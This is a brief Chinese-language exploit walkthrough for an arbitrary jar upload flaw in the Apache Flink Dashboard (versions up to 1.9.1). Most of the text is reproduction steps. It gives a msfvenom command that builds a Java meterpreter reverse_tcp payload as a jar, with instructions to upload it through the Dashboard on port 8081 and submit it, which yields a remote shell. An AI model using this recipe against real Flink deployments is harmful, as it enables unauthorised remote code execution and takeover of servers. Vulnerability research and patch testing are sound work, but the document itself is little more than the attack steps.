漏洞概述:
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能;漏洞影响:至目前最新版本Apache Flink 1.9.1;攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的
环境:
下载http://mirrors.tuna.tsinghua.edu ... -bin-scala_2.11.tgz
解压后访问8081端口
msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f jar > rce.jar
上传后点击 Submit